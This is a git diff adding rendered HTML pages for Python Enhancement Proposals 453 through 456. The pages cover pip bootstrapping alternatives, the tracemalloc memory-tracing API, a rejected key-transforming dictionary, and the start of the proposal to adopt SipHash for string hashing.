Earlier versions of this PEP proposed changing the name of the script +installation directory on Windows from “Scripts” to “bin” in order to +improve the cross-platform consistency of the virtual environments created +by pyvenv.

+

However, Paul Moore determined that this change was likely backwards +incompatible with cross-version Windows installers created with previous +versions of Python, so the change has been removed from this PEP +[2].

+
+
+

Including ensurepip in Python 2.7, and 3.3

+

Earlier versions of this PEP made the case that the challenges of getting +pip bootstrapped for new users posed a significant enough barrier to +Python’s future growth that it justified adding ensurepip as a new +feature in the upcoming Python 2.7 and 3.3 maintenance releases.

+

While the proposal to provide pip with Python 3.4 was universally +popular, this part of the proposal was highly controversial and ultimately +rejected by MvL as BDFL-Delegate.

+

Accordingly, the proposal to backport ensurepip to Python 2.7 and 3.3 +has been removed from this PEP in favour of creating a Windows installer +for pip and a possible future PEP suggesting creation of an aggregate +installer for Python 2.7 that combines CPython 2.7, pip and the Python +Launcher for Windows.

+
+
+

Automatically contacting PyPI when bootstrapping pip

+

Earlier versions of this PEP called the bootstrapping module getpip and +defaulted to downloading and installing pip from PyPI, with the private +copy used only as a fallback option or when explicitly requested.

+

This resulted in several complex edge cases, along with difficulties in +defining a clean API and CLI for the bootstrap module. It also significantly +altered the default trust model for the binary installers published on +python.org, as end users would need to explicitly opt-out of trusting +the security of the PyPI ecosystem (rather than opting in to it by +explicitly invoking pip following installation).

+

As a result, the PEP was simplified to the current design, where the +bootstrapping always uses the private copy of pip. Contacting PyPI +is now always an explicit separate step, with direct access to the full +pip interface.

+

Removing the implicit attempt to access PyPI also made it feasible to +invoke ensurepip by default when installing from a custom source build.

+
+
+

Implicit bootstrap

+

PEP 439, the predecessor for this PEP, proposes its own solution. Its +solution involves shipping a fake pip command that when executed would +implicitly bootstrap and install pip if it does not already exist. This has +been rejected because it is too “magical”. It hides from the end user when +exactly the pip command will be installed or that it is being installed at +all. It also does not provide any recommendations or considerations towards +downstream packagers who wish to manage the globally installed pip through +the mechanisms typical for their system.

+

The implicit bootstrap mechanism also ran into possible permissions issues, +if a user inadvertently attempted to bootstrap pip without write access to +the appropriate installation directories.

+
+
+

Including pip directly in the standard library

+

Similar to this PEP is the proposal of just including pip in the standard +library. This would ensure that Python always includes pip and fixes all of the +end user facing problems with not having pip present by default. This has been +rejected because we’ve learned, through the inclusion and history of +distutils in the standard library, that losing the ability to update the +packaging tools independently can leave the tooling in a state of constant +limbo. Making it unable to ever reasonably evolve in a time frame that actually +affects users as any new features will not be available to the general +population for years.

+

Allowing the packaging tools to progress separately from the Python release +and adoption schedules allows the improvements to be used by all members +of the Python community and not just those able to live on the bleeding edge +of Python releases.

+

There have also been issues in the past with the “dual maintenance” problem +if a project continues to be maintained externally while also having a +fork maintained in the standard library. Since external maintenance of +pip will always be needed to support earlier Python versions, the +proposed bootstrapping mechanism will becoming the explicit responsibility +of the CPython core developers (assisted by the pip developers), while +pip issues reported to the CPython tracker will be migrated to the pip +issue tracker. There will no doubt still be some user confusion over which +tracker to use, but hopefully less than has been seen historically when +including complete public copies of third-party projects in the standard +library.

+

The approach described in this PEP also avoids some technical issues +related to handling CPython maintenance updates when pip has been +independently updated to a more recent version. The proposed pip-based +bootstrapping mechanism handles that automatically, since pip and the +system installer never get into a fight about who owns the pip +installation (it is always managed through pip, either directly, or +indirectly via the ensurepip bootstrap module).

+

Finally, the separate bootstrapping step means it is also easy to avoid +installing pip at all if end users so desire. This is often the case +if integrators are using system packages to handle installation of +components written in multiple languages using a common set of tools.

+
+
+

Defaulting to –user installation

+

Some consideration was given to bootstrapping pip into the per-user +site-packages directory by default. However, this behavior would be +surprising (as it differs from the default behavior of pip itself) +and is also not currently considered reliable (there are some edge cases +which are not handled correctly when pip is installed into the user +site-packages directory rather than the system site-packages).

+
+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0453.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0454/index.html b/pep-0454/index.html new file mode 100644 index 00000000000..d97b8d18d8d --- /dev/null +++ b/pep-0454/index.html @@ -0,0 +1,593 @@ + + + + + + + + PEP 454 – Add a new tracemalloc module to trace Python memory allocations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 454 – Add a new tracemalloc module to trace Python memory allocations

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
BDFL-Delegate:
+
Charles-François Natali <cf.natali at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
03-Sep-2013
+
Python-Version:
+
3.4
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add a new tracemalloc module to trace memory +blocks allocated by Python.

+
+
+

Rationale

+

Classic generic tools like Valgrind can get the C traceback where a +memory block was allocated. Using such tools to analyze Python memory +allocations does not help because most memory blocks are allocated in +the same C function, in PyMem_Malloc() for example. Moreover, Python +has an allocator for small objects called “pymalloc” which keeps free +blocks for efficiency. This is not well handled by these tools.

+

There are debug tools dedicated to the Python language like Heapy +Pympler and Meliae which lists all alive objects using the +garbage collector module (functions like gc.get_objects(), +gc.get_referrers() and gc.get_referents()), compute their size +(ex: using sys.getsizeof()) and group objects by type. These tools +provide a better estimation of the memory usage of an application. They +are useful when most memory leaks are instances of the same type and +this type is only instantiated in a few functions. Problems arise when +the object type is very common like str or tuple, and it is hard +to identify where these objects are instantiated.

+

Finding reference cycles is also a difficult problem. There are +different tools to draw a diagram of all references. These tools +cannot be used on large applications with thousands of objects because +the diagram is too huge to be analyzed manually.

+
+
+

Proposal

+

Using the customized allocation API from PEP 445, it becomes easy to +set up a hook on Python memory allocators. A hook can inspect Python +internals to retrieve Python tracebacks. The idea of getting the current +traceback comes from the faulthandler module. The faulthandler dumps +the traceback of all Python threads on a crash, here is the idea is to +get the traceback of the current Python thread when a memory block is +allocated by Python.

+

This PEP proposes to add a new tracemalloc module, a debug tool +to trace memory blocks allocated by Python. The module provides the +following information:

+
    +
  • Traceback where an object was allocated
  • +
  • Statistics on allocated memory blocks per filename and per line +number: total size, number and average size of allocated memory blocks
  • +
  • Computed differences between two snapshots to detect memory leaks
  • +
+

The API of the tracemalloc module is similar to the API of the faulthandler +module: enable() / start(), disable() / stop() and +is_enabled() / is_tracing() functions, an environment variable +(PYTHONFAULTHANDLER and PYTHONTRACEMALLOC), and a -X command line +option (-X faulthandler and -X tracemalloc). See the documentation of +the faulthandler module.

+

The idea of tracing memory allocations is not new. It was first +implemented in the PySizer project in 2005. PySizer was implemented +differently: the traceback was stored in frame objects and some Python +types were linked the trace with the name of object type. PySizer patch +on CPython adds an overhead on performances and memory footprint, even if +the PySizer was not used. tracemalloc attaches a traceback to the +underlying layer, to memory blocks, and has no overhead when the module +is not tracing memory allocations.

+

The tracemalloc module has been written for CPython. Other +implementations of Python may not be able to provide it.

+
+
+

API

+

To trace most memory blocks allocated by Python, the module should be +started as early as possible by setting the PYTHONTRACEMALLOC +environment variable to 1, or by using -X tracemalloc command +line option. The tracemalloc.start() function can be called at +runtime to start tracing Python memory allocations.

+

By default, a trace of an allocated memory block only stores the most +recent frame (1 frame). To store 25 frames at startup: set the +PYTHONTRACEMALLOC environment variable to 25, or use the -X +tracemalloc=25 command line option. The set_traceback_limit() +function can be used at runtime to set the limit.

+
+

Functions

+

clear_traces() function:

+
+
Clear traces of memory blocks allocated by Python.

See also stop().

+
+

get_object_traceback(obj) function:

+
+
Get the traceback where the Python object obj was allocated. +Return a Traceback instance, or None if the tracemalloc +module is not tracing memory allocations or did not trace the +allocation of the object.

See also gc.get_referrers() and sys.getsizeof() functions.

+
+

get_traceback_limit() function:

+
+
Get the maximum number of frames stored in the traceback of a trace.

The tracemalloc module must be tracing memory allocations to get +the limit, otherwise an exception is raised.

+

The limit is set by the start() function.

+
+

get_traced_memory() function:

+
+
Get the current size and maximum size of memory blocks traced by the +tracemalloc module as a tuple: (size: int, max_size: int).
+

get_tracemalloc_memory() function:

+
+
Get the memory usage in bytes of the tracemalloc module used to +store traces of memory blocks. Return an int.
+

is_tracing() function:

+
+
True if the tracemalloc module is tracing Python memory +allocations, False otherwise.

See also start() and stop() functions.

+
+

start(nframe: int=1) function:

+
+
Start tracing Python memory allocations: install hooks on Python +memory allocators. Collected tracebacks of traces will be limited to +nframe frames. By default, a trace of a memory block only stores +the most recent frame: the limit is 1. nframe must be greater +or equal to 1.

Storing more than 1 frame is only useful to compute statistics +grouped by 'traceback' or to compute cumulative statistics: see +the Snapshot.compare_to() and Snapshot.statistics() methods.

+

Storing more frames increases the memory and CPU overhead of the +tracemalloc module. Use the get_tracemalloc_memory() +function to measure how much memory is used by the tracemalloc +module.

+

The PYTHONTRACEMALLOC environment variable +(PYTHONTRACEMALLOC=NFRAME) and the -X tracemalloc=NFRAME +command line option can be used to start tracing at startup.

+

See also stop(), is_tracing() and get_traceback_limit() +functions.

+
+

stop() function:

+
+
Stop tracing Python memory allocations: uninstall hooks on Python +memory allocators. Clear also traces of memory blocks allocated by +Python

Call take_snapshot() function to take a snapshot of traces +before clearing them.

+

See also start() and is_tracing() functions.

+
+

take_snapshot() function:

+
+
Take a snapshot of traces of memory blocks allocated by Python. +Return a new Snapshot instance.

The snapshot does not include memory blocks allocated before the +tracemalloc module started to trace memory allocations.

+

Tracebacks of traces are limited to get_traceback_limit() +frames. Use the nframe parameter of the start() function to +store more frames.

+

The tracemalloc module must be tracing memory allocations to +take a snapshot, see the start() function.

+

See also the get_object_traceback() function.

+
+
+
+

Filter

+

Filter(inclusive: bool, filename_pattern: str, lineno: int=None, all_frames: bool=False) class:

+
+
Filter on traces of memory blocks.

See the fnmatch.fnmatch() function for the syntax of +filename_pattern. The '.pyc' and '.pyo' file extensions +are replaced with '.py'.

+

Examples:

+
    +
  • Filter(True, subprocess.__file__) only includes traces of the +subprocess module
  • +
  • Filter(False, tracemalloc.__file__) excludes traces of the +tracemalloc module
  • +
  • Filter(False, "<unknown>") excludes empty tracebacks
  • +
+
+

inclusive attribute:

+
+
If inclusive is True (include), only trace memory blocks +allocated in a file with a name matching filename_pattern at +line number lineno.

If inclusive is False (exclude), ignore memory blocks +allocated in a file with a name matching filename_pattern at +line number lineno.

+
+

lineno attribute:

+
+
Line number (int) of the filter. If lineno is None, the +filter matches any line number.
+

filename_pattern attribute:

+
+
Filename pattern of the filter (str).
+

all_frames attribute:

+
+
If all_frames is True, all frames of the traceback are +checked. If all_frames is False, only the most recent frame is +checked.

This attribute is ignored if the traceback limit is less than 2. +See the get_traceback_limit() function and +Snapshot.traceback_limit attribute.

+
+
+
+

Frame

+

Frame class:

+
+
Frame of a traceback.

The Traceback class is a sequence of Frame instances.

+
+

filename attribute:

+
+
Filename (str).
+

lineno attribute:

+
+
Line number (int).
+
+
+

Snapshot

+

Snapshot class:

+
+
Snapshot of traces of memory blocks allocated by Python.

The take_snapshot() function creates a snapshot instance.

+
+

compare_to(old_snapshot: Snapshot, group_by: str, cumulative: bool=False) method:

+
+
Compute the differences with an old snapshot. Get statistics as a +sorted list of StatisticDiff instances grouped by group_by.

See the statistics() method for group_by and cumulative +parameters.

+

The result is sorted from the biggest to the smallest by: absolute +value of StatisticDiff.size_diff, StatisticDiff.size, +absolute value of StatisticDiff.count_diff, Statistic.count +and then by StatisticDiff.traceback.

+
+

dump(filename) method:

+
+
Write the snapshot into a file.

Use load() to reload the snapshot.

+
+

filter_traces(filters) method:

+
+
Create a new Snapshot instance with a filtered traces +sequence, filters is a list of Filter instances. If filters +is an empty list, return a new Snapshot instance with a copy of +the traces.

All inclusive filters are applied at once, a trace is ignored if no +inclusive filters match it. A trace is ignored if at least one +exclusive filter matches it.

+
+

load(filename) classmethod:

+
+
Load a snapshot from a file.

See also dump().

+
+

statistics(group_by: str, cumulative: bool=False) method:

+
+
Get statistics as a sorted list of Statistic instances grouped +by group_by: + + + + + + + + + + + + + + + + +
group_bydescription
'filename'filename
'lineno'filename and line number
'traceback'traceback
+

If cumulative is True, cumulate size and count of memory +blocks of all frames of the traceback of a trace, not only the most +recent frame. The cumulative mode can only be used with group_by +equals to 'filename' and 'lineno' and traceback_limit +greater than 1.

+

The result is sorted from the biggest to the smallest by: +Statistic.size, Statistic.count and then by +Statistic.traceback.

+
+

traceback_limit attribute:

+
+
Maximum number of frames stored in the traceback of traces: +result of the get_traceback_limit() when the snapshot was taken.
+

traces attribute:

+
+
Traces of all memory blocks allocated by Python: sequence of +Trace instances.

The sequence has an undefined order. Use the +Snapshot.statistics() method to get a sorted list of statistics.

+
+
+
+

Statistic

+

Statistic class:

+
+
Statistic on memory allocations.

Snapshot.statistics() returns a list of Statistic instances.

+

See also the StatisticDiff class.

+
+

count attribute:

+
+
Number of memory blocks (int).
+

size attribute:

+
+
Total size of memory blocks in bytes (int).
+

traceback attribute:

+
+
Traceback where the memory block was allocated, Traceback +instance.
+
+
+

StatisticDiff

+

StatisticDiff class:

+
+
Statistic difference on memory allocations between an old and a new +Snapshot instance.

Snapshot.compare_to() returns a list of StatisticDiff +instances. See also the Statistic class.

+
+

count attribute:

+
+
Number of memory blocks in the new snapshot (int): 0 if the +memory blocks have been released in the new snapshot.
+

count_diff attribute:

+
+
Difference of number of memory blocks between the old and the new +snapshots (int): 0 if the memory blocks have been allocated +in the new snapshot.
+

size attribute:

+
+
Total size of memory blocks in bytes in the new snapshot (int): +0 if the memory blocks have been released in the new snapshot.
+

size_diff attribute:

+
+
Difference of total size of memory blocks in bytes between the old +and the new snapshots (int): 0 if the memory blocks have +been allocated in the new snapshot.
+

traceback attribute:

+
+
Traceback where the memory blocks were allocated, Traceback +instance.
+
+
+

Trace

+

Trace class:

+
+
Trace of a memory block.

The Snapshot.traces attribute is a sequence of Trace +instances.

+
+

size attribute:

+
+
Size of the memory block in bytes (int).
+

traceback attribute:

+
+
Traceback where the memory block was allocated, Traceback +instance.
+
+
+

Traceback

+

Traceback class:

+
+
Sequence of Frame instances sorted from the most recent frame to +the oldest frame.

A traceback contains at least 1 frame. If the tracemalloc module +failed to get a frame, the filename "<unknown>" at line number 0 is +used.

+

When a snapshot is taken, tracebacks of traces are limited to +get_traceback_limit() frames. See the take_snapshot() +function.

+

The Trace.traceback attribute is an instance of Traceback +instance.

+
+
+
+
+

Rejected Alternatives

+
+

Log calls to the memory allocator

+

A different approach is to log calls to malloc(), realloc() and +free() functions. Calls can be logged into a file or send to another +computer through the network. Example of a log entry: name of the +function, size of the memory block, address of the memory block, Python +traceback where the allocation occurred, timestamp.

+

Logs cannot be used directly, getting the current status of the memory +requires to parse previous logs. For example, it is not possible to get +directly the traceback of a Python object, like +get_object_traceback(obj) does with traces.

+

Python uses objects with a very short lifetime and so makes an extensive +use of memory allocators. It has an allocator optimized for small +objects (less than 512 bytes) with a short lifetime. For example, the +Python test suites calls malloc(), realloc() or free() +270,000 times per second in average. If the size of log entry is 32 +bytes, logging produces 8.2 MB per second or 29.0 GB per hour.

+

The alternative was rejected because it is less efficient and has less +features. Parsing logs in a different process or a different computer is +slower than maintaining traces on allocated memory blocks in the same +process.

+
+
+
+

Prior Work

+
    +
  • Python Memory Validator (2005-2013): +commercial Python memory validator developed by Software Verification. +It uses the Python Reflection API.
  • +
  • PySizer: Google Summer of Code 2005 project by +Nick Smallbone.
  • +
  • Heapy (2006-2013): +part of the Guppy-PE project written by Sverker Nilsson.
  • +
  • Draft PEP: Support Tracking Low-Level Memory Usage in CPython +(Brett Canon, 2006)
  • +
  • Muppy: project developed in 2008 by Robert Schuppenies.
  • +
  • asizeof: +a pure Python module to estimate the size of objects by Jean +Brouwers (2008).
  • +
  • Heapmonitor: +It provides facilities to size individual objects and can track all objects +of certain classes. It was developed in 2008 by Ludwig Haehne.
  • +
  • Pympler (2008-2011): +project based on asizeof, muppy and HeapMonitor
  • +
  • objgraph (2008-2012)
  • +
  • Dozer: WSGI Middleware version +of the CherryPy memory leak debugger, written by Marius Gedminas (2008-2013)
  • +
  • Meliae: +Python Memory Usage Analyzer developed by John A Meinel since 2009
  • +
  • gdb-heap: gdb script written in +Python by Dave Malcolm (2010-2011) to analyze the usage of the heap memory
  • +
  • memory_profiler: +written by Fabian Pedregosa (2011-2013)
  • +
  • caulk: written by Ben Timby in 2012
  • +
+

See also Pympler Related Work.

+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0454.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0455/index.html b/pep-0455/index.html new file mode 100644 index 00000000000..eaae2fbce15 --- /dev/null +++ b/pep-0455/index.html @@ -0,0 +1,415 @@ + + + + + + + + PEP 455 – Adding a key-transforming dictionary to collections | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 455 – Adding a key-transforming dictionary to collections

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
BDFL-Delegate:
+
Raymond Hettinger
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
13-Sep-2013
+
Python-Version:
+
3.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new data structure for the collections module, +called “TransformDict” in this PEP. This structure is a mutable mapping +which transforms the key using a given function when doing a lookup, but +retains the original key when reading.

+
+

Rejection

+

See the rationale at +https://mail.python.org/pipermail/python-dev/2015-May/140003.html +and for an earlier partial review, see +https://mail.python.org/pipermail/python-dev/2013-October/129937.html .

+
+
+
+

Rationale

+

Numerous specialized versions of this pattern exist. The most common +is a case-insensitive case-preserving dict, i.e. a dict-like container +which matches keys in a case-insensitive fashion but retains the original +casing. It is a very common need in network programming, as many +protocols feature some arrays of “key / value” properties in their +messages, where the keys are textual strings whose case is specified to +be ignored on receipt but by either specification or custom is to be +preserved or non-trivially canonicalized when retransmitted.

+

Another common request is an identity dict, where keys are matched +according to their respective id()s instead of normal matching.

+

Both are instances of a more general pattern, where a given transformation +function is applied to keys when looking them up: that function being +str.lower or str.casefold in the former example and the built-in +id function in the latter.

+

(It could be said that the pattern projects keys from the user-visible +set onto the internal lookup set.)

+
+
+

Semantics

+

TransformDict is a MutableMapping implementation: it faithfully +implements the well-known API of mutable mappings, like dict itself +and other dict-like classes in the standard library. Therefore, this PEP +won’t rehash the semantics of most TransformDict methods.

+

The transformation function needn’t be bijective, it can be strictly +surjective as in the case-insensitive example (in other words, different +keys can lookup the same value):

+
>>> d = TransformDict(str.casefold)
+>>> d['SomeKey'] = 5
+>>> d['somekey']
+5
+>>> d['SOMEKEY']
+5
+
+
+

TransformDict retains the first key used when creating an entry:

+
>>> d = TransformDict(str.casefold)
+>>> d['SomeKey'] = 1
+>>> d['somekey'] = 2
+>>> list(d.items())
+[('SomeKey', 2)]
+
+
+

The original keys needn’t be hashable, as long as the transformation +function returns a hashable one:

+
>>> d = TransformDict(id)
+>>> l = [None]
+>>> d[l] = 5
+>>> l in d
+True
+
+
+
+

Constructor

+

As shown in the examples above, creating a TransformDict requires passing +the key transformation function as the first argument (much like creating +a defaultdict requires passing the factory function as first argument).

+

The constructor also takes other optional arguments which can be used +to initialize the TransformDict with certain key-value pairs. Those +optional arguments are the same as in the dict and defaultdict +constructors:

+
>>> d = TransformDict(str.casefold, [('Foo', 1)], Bar=2)
+>>> sorted(d.items())
+[('Bar', 2), ('Foo', 1)]
+
+
+
+
+

Getting the original key

+

TransformDict also features a lookup method returning the stored key +together with the corresponding value:

+
>>> d = TransformDict(str.casefold, {'Foo': 1})
+>>> d.getitem('FOO')
+('Foo', 1)
+>>> d.getitem('bar')
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+KeyError: 'bar'
+
+
+

The method name getitem() follows the standard popitem() method +on mutable mappings.

+
+
+

Getting the transformation function

+

TransformDict has a simple read-only property transform_func which +gives back the transformation function.

+
+
+
+

Alternative proposals and questions

+
+

Retaining the last original key

+

Most python-dev respondents found retaining the first user-supplied key +more intuitive than retaining the last. Also, it matches the dict +object’s own behaviour when using different but equal keys:

+
>>> d = {}
+>>> d[1] = 'hello'
+>>> d[1.0] = 'world'
+>>> d
+{1: 'world'}
+
+
+

Furthermore, explicitly retaining the last key in a first-key-retaining +scheme is still possible using the following approach:

+
d.pop(key, None)
+d[key] = value
+
+
+

while the converse (retaining the first key in a last-key-retaining +scheme) doesn’t look possible without rewriting part of the container’s +code.

+
+
+

Using an encoder / decoder pair

+

Using a function pair isn’t necessary, since the original key is retained +by the container. Moreover, an encoder / decoder pair would require the +transformation to be bijective, which prevents important use cases +like case-insensitive matching.

+
+
+

Providing a transformation function for values

+

Dictionary values are not used for lookup, their semantics are totally +irrelevant to the container’s operation. Therefore, there is no point in +having both an “original” and a “transformed” value: the transformed +value wouldn’t be used for anything.

+
+
+

Providing a specialized container, not generic

+

It was asked why we would provide the generic TransformDict construct +rather than a specialized case-insensitive dict variant. The answer +is that it’s nearly as cheap (code-wise and performance-wise) to provide +the generic construct, and it can fill more use cases.

+

Even case-insensitive dicts can actually elicit different transformation +functions: str.lower, str.casefold or in some cases bytes.lower +when working with text encoded in an ASCII-compatible encoding.

+
+
+

Other constructor patterns

+

Two other constructor patterns were proposed by Serhiy Storchaka:

+
    +
  • A type factory scheme:
    d = TransformDict(str.casefold)(Foo=1)
    +
    +
    +
  • +
  • A subclassing scheme:
    class CaseInsensitiveDict(TransformDict):
    +    __transform__ = str.casefold
    +
    +d = CaseInsensitiveDict(Foo=1)
    +
    +
    +
  • +
+

While both approaches can be defended, they don’t follow established +practices in the standard library, and therefore were rejected.

+
+
+
+

Implementation

+

A patch for the collections module is tracked on the bug tracker at +http://bugs.python.org/issue18986.

+
+
+

Existing work

+

Case-insensitive dicts are a popular request:

+ +

Identity dicts have been requested too:

+ +

Several modules in the standard library use identity lookups for object +memoization, for example pickle, json, copy, cProfile, +doctest and _threading_local.

+
+

Other languages

+
+

C# / .Net

+

.Net has a generic Dictionary class where you can specify a custom +IEqualityComparer: http://msdn.microsoft.com/en-us/library/xfhwa508.aspx

+

Using it is the recommended way to write case-insensitive dictionaries: +http://stackoverflow.com/questions/13230414/case-insensitive-access-for-generic-dictionary

+
+
+

Java

+

Java has a specialized CaseInsensitiveMap: +http://commons.apache.org/proper/commons-collections/apidocs/org/apache/commons/collections4/map/CaseInsensitiveMap.html

+

It also has a separate IdentityHashMap: +http://docs.oracle.com/javase/6/docs/api/java/util/IdentityHashMap.html

+
+
+

C++

+

The C++ Standard Template Library features an unordered_map +with customizable hash and equality functions: +http://www.cplusplus.com/reference/unordered_map/unordered_map/

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0455.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0456/index.html b/pep-0456/index.html new file mode 100644 index 00000000000..1c2066bcae1 --- /dev/null +++ b/pep-0456/index.html @@ -0,0 +1,898 @@ + + + + + + + + PEP 456 – Secure and interchangeable hash algorithm | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 456 – Secure and interchangeable hash algorithm

+
+
Author:
+
Christian Heimes <christian at python.org>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Sep-2013
+
Python-Version:
+
3.4
+
Post-History:
+
06-Oct-2013, 14-Nov-2013, 20-Nov-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes SipHash as default string and bytes hash algorithm to properly +fix hash randomization once and for all. It also proposes modifications to +Python’s C code in order to unify the hash code and to make it easily +interchangeable.

+
+
+

Rationale

+

Despite the last attempt [issue13703] CPython is still vulnerable to hash +collision DoS attacks [29c3] [issue14621]. The current hash algorithm and +its randomization is not resilient against attacks. Only a proper +cryptographic hash function prevents the extraction of secret randomization +keys. Although no practical attack against a Python-based service has been +seen yet, the weakness has to be fixed. Jean-Philippe Aumasson and Daniel +J. Bernstein have already shown how the seed for the current implementation +can be recovered [poc].

+

Furthermore, the current hash algorithm is hard-coded and implemented multiple +times for bytes and three different Unicode representations UCS1, UCS2 and +UCS4. This makes it impossible for embedders to replace it with a different +implementation without patching and recompiling large parts of the interpreter. +Embedders may want to choose a more suitable hash function.

+

Finally the current implementation code does not perform well. In the common +case it only processes one or two bytes per cycle. On a modern 64-bit processor +the code can easily be adjusted to deal with eight bytes at once.

+

This PEP proposes three major changes to the hash code for strings and bytes:

+
    +
  • SipHash [sip] is introduced as default hash algorithm. It is fast and small +despite its cryptographic properties. Due to the fact that it was designed +by well known security and crypto experts, it is safe to assume that its +secure for the near future.
  • +
  • The existing FNV code is kept for platforms without a 64-bit data type. The +algorithm is optimized to process larger chunks per cycle.
  • +
  • Calculation of the hash of strings and bytes is moved into a single API +function instead of multiple specialized implementations in +Objects/object.c and Objects/unicodeobject.c. The function takes a +void pointer plus length and returns the hash for it.
  • +
  • The algorithm can be selected at compile time. FNV is guaranteed to exist +on all platforms. SipHash is available on the majority of modern systems.
  • +
+
+
+

Requirements for a hash function

+
    +
  • It MUST be able to hash arbitrarily large blocks of memory from 1 byte up +to the maximum ssize_t value.
  • +
  • It MUST produce at least 32 bits on 32-bit platforms and at least 64 bits +on 64-bit platforms. (Note: Larger outputs can be compressed with e.g. +v ^ (v >> 32).)
  • +
  • It MUST support hashing of unaligned memory in order to support +hash(memoryview).
  • +
  • It is highly RECOMMENDED that the length of the input influences the +outcome, so that hash(b'\00') != hash(b'\x00\x00').
  • +
+

The internal interface code between the hash function and the tp_hash slots +implements special cases for zero length input and a return value of -1. +An input of length 0 is mapped to hash value 0. The output -1 +is mapped to -2.

+
+
+

Current implementation with modified FNV

+

CPython currently uses a variant of the Fowler-Noll-Vo hash function +[fnv]. The variant is has been modified to reduce the amount and cost of hash +collisions for common strings. The first character of the string is added +twice, the first time with a bit shift of 7. The length of the input +string is XOR-ed to the final value. Both deviations from the original FNV +algorithm reduce the amount of hash collisions for short strings.

+

Recently [issue13703] a random prefix and suffix were added as an attempt to +randomize the hash values. In order to protect the hash secret the code still +returns 0 for zero length input.

+

C code:

+
Py_uhash_t x;
+Py_ssize_t len;
+/* p is either 1, 2 or 4 byte type */
+unsigned char *p;
+Py_UCS2 *p;
+Py_UCS4 *p;
+
+if (len == 0)
+    return 0;
+x = (Py_uhash_t) _Py_HashSecret.prefix;
+x ^= (Py_uhash_t) *p << 7;
+for (i = 0; i < len; i++)
+    x = (1000003 * x) ^ (Py_uhash_t) *p++;
+x ^= (Py_uhash_t) len;
+x ^= (Py_uhash_t) _Py_HashSecret.suffix;
+return x;
+
+
+

Which roughly translates to Python:

+
def fnv(p):
+    if len(p) == 0:
+        return 0
+
+    # bit mask, 2**32-1 or 2**64-1
+    mask = 2 * sys.maxsize + 1
+
+    x = hashsecret.prefix
+    x = (x ^ (ord(p[0]) << 7)) & mask
+    for c in p:
+        x = ((1000003 * x) ^ ord(c)) & mask
+    x = (x ^ len(p)) & mask
+    x = (x ^ hashsecret.suffix) & mask
+
+    if x == -1:
+        x = -2
+
+    return x
+
+
+

FNV is a simple multiply and XOR algorithm with no cryptographic properties. +The randomization was not part of the initial hash code, but was added as +counter measure against hash collision attacks as explained in oCERT-2011-003 +[ocert]. Because FNV is not a cryptographic hash algorithm and the dict +implementation is not fortified against side channel analysis, the +randomization secrets can be calculated by a remote attacker. The author of +this PEP strongly believes that the nature of a non-cryptographic hash +function makes it impossible to conceal the secrets.

+
+
+

Examined hashing algorithms

+

The author of this PEP has researched several hashing algorithms that are +considered modern, fast and state-of-the-art.

+
+

SipHash

+

SipHash [sip] is a cryptographic pseudo random function with a 128-bit seed +and 64-bit output. It was designed by Jean-Philippe Aumasson and Daniel J. +Bernstein as a fast and secure keyed hash algorithm. It’s used by Ruby, Perl, +OpenDNS, Rust, Redis, FreeBSD and more. The C reference implementation has +been released under CC0 license (public domain).

+

Quote from SipHash’s site:

+
+
SipHash is a family of pseudorandom functions (a.k.a. keyed hash +functions) optimized for speed on short messages. Target applications +include network traffic authentication and defense against hash-flooding +DoS attacks.
+

siphash24 is the recommend variant with best performance. It uses 2 rounds per +message block and 4 finalization rounds. Besides the reference implementation +several other implementations are available. Some are single-shot functions, +others use a Merkle–Damgård construction-like approach with init, update and +finalize functions. Marek Majkowski C implementation csiphash [csiphash] +defines the prototype of the function. (Note: k is split up into two +uint64_t):

+
uint64_t siphash24(const void *src, unsigned long src_sz, const char k[16])
+
+
+

SipHash requires a 64-bit data type and is not compatible with pure C89 +platforms.

+
+
+

MurmurHash

+

MurmurHash [murmur] is a family of non-cryptographic keyed hash function +developed by Austin Appleby. Murmur3 is the latest and fast variant of +MurmurHash. The C++ reference implementation has been released into public +domain. It features 32- or 128-bit output with a 32-bit seed. (Note: The out +parameter is a buffer with either 1 or 4 bytes.)

+

Murmur3’s function prototypes are:

+
void MurmurHash3_x86_32(const void *key, int len, uint32_t seed, void *out)
+
+void MurmurHash3_x86_128(const void *key, int len, uint32_t seed, void *out)
+
+void MurmurHash3_x64_128(const void *key, int len, uint32_t seed, void *out)
+
+
+

The 128-bit variants requires a 64-bit data type and are not compatible with +pure C89 platforms. The 32-bit variant is fully C89-compatible.

+

